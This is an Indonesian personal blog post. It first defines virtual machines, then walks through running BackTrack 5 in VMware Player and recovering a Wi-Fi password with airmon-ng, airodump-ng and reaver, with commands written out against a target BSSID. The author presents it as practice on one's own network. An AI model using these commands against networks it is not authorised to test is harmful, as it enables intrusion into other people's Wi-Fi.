Kamis, 11 Desember 2014

VIRTUAL MACHINE

Mesin virtual  dalam ilmu komputer adalah implementasi perangkat lunak dari sebuah mesin komputer yang dapat menjalankan program sama seperti layaknya sebuah komputer asli.

Mesin virtual terdiri dari dua kategori besar, dipisahkan menurut cara penggunaan dan tingkat keterhubungannya dengan mesin-mesin aslinya. Sebuah mesin virtual sistem adalah perangkat yang berupa platform sistem yang lengkap dan dapat menjalankan sebuah sistem operasi yang lengkap. Sebaliknya, mesin virtual proses didesain untuk menjalankan sebuah program komputer tertentu (tunggal), yang berarti mesin virtual ini mendukung proses tertentu juga.
Karakteristik mendasar dari sebuah mesin virtual adalah batasan-batasan bagi perangkat lunak yang berjalan di dalam mesin tersebut, sumber daya yang dibatasi, dan tidak dapat mengakses ke luar tembok batasan dunia maya itu.

Virtual machine adalah program yang berguna untuk melakukan simulasi suatu sistem PC lengkap.
Yang dimaksud ‘lengkap disini adalah RAM, hard disk, floppy disk, prosesor, graphics card danbeberapa device lain yang umumnya  terdapat pada PC.
Program semacam ini mungkin tidak banyak berguna bagi sebagian orang, tapi untuk kebutuhan tertentu atau spesifik,manfaatnya akan sangat terasa.Program virtual machine atau disebut juga emulator bekerja berdasarkan prinsip emulasi. Oleh karena cara kerjanya yang ‘menirukan’ aslinya tersebut, maka emulator tidak terlepas dari beberapa keterbatasan

Walah... malah puyeng co-pas sana sini, tapi nggak ngerti.
Yang penting bisa pakai nya....urusan definisi .....bodo amat
Intinya buat di Windows bisa menjalankan Oeration System lainnya tanpa harus instal side by side atau instal penuh di harddisk.
Sebelumnya udah pernah pake Virtualbox nah sekarang VMware-player 32bit atau VMware-player 64bit   untuk menjalankan BACKTRACK5R3-GNOME-VM-32 buat latihan hack wi-fi sendiri
BT5R3-GNOME-VM-32 besaran filenya 2.394 GB setelah diextract jadi 11.0 GB bukan maen dah.
Kenapa pilih file berformat .vmdk ? karna berintegrasi dengan system aslinya
jadi bisa bisa copy-paste,kalau file .iso nggak bisa kecuali instal side by side.

PENGEN TAHU PASSWORD WI-FI
Untuk laptop/netbook tambahkan usb wi-fi yang sudah terinstal drivernya di windows karena wi-fi bawaan nggak kedetek, kecuali instal Backtrack nya di harddisk atau side by side (tergantung laptop/netbook nya kale...meneketehe)











Instal VMware-player hingga selesai
Jika sudah punya DVD/ISO file plih ISO , Pilih .VMDK jika BT5R3-GNOME-VM-32
login           : root  = > enter
password : toor  = > enter
startx                       = > enter


Colokan usb wi-fi hingga muncul dipojok lalu klik kanan connect kan


Buka terminal ketik
airmon-ng untuk mengecek hardware wi-fi dan wlan barapa, karna ini usb wi-fi ketiga yang di coba maka munculnya wlan2..kita anggap saja wlan0 ya
airmon-ng start wlan0

Perintah berikutnya harus sama dengan yang diberi garis tanda hijau, bisa jadi berbeda misal
wlan0,wlan1,mon1,ra0....dsb
airodump-ng mon0
Tekan Ctrl+C - blok BSSID target copy&pastekan ke notepad lalu copy&pastekan setelah -b
kalau mau ngetik ya silahkan
reaver -i mon0 -f -c 1 -a -b 74:ea:3a:d3:d2:64 -v -d 0
angka 1 setelah huruf c adalah channel target
atau yang singkat reaver -i mon0 -b 74:ea:3a:d3:d2:64 -vv
Tunggu hingga 100% completed nanti muncul password nya dah , silahkan hitung sendiri untuk mencapai 1 persen butuh waktu berapa menit? Semua itu tergantung signal strength,traffic,spek PC/Laptop/Netbook masing-masing serta OS yang dipakai.

Bisa juga pakai gerix atau fern tapi di NETBOOK ACER D257 berat malah hang


KALI LINUX .vmdk



1 komentar: